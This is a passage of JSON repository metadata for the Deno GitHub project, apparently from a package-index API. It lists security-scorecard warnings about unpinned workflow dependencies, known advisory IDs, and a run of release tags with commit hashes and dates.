.github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6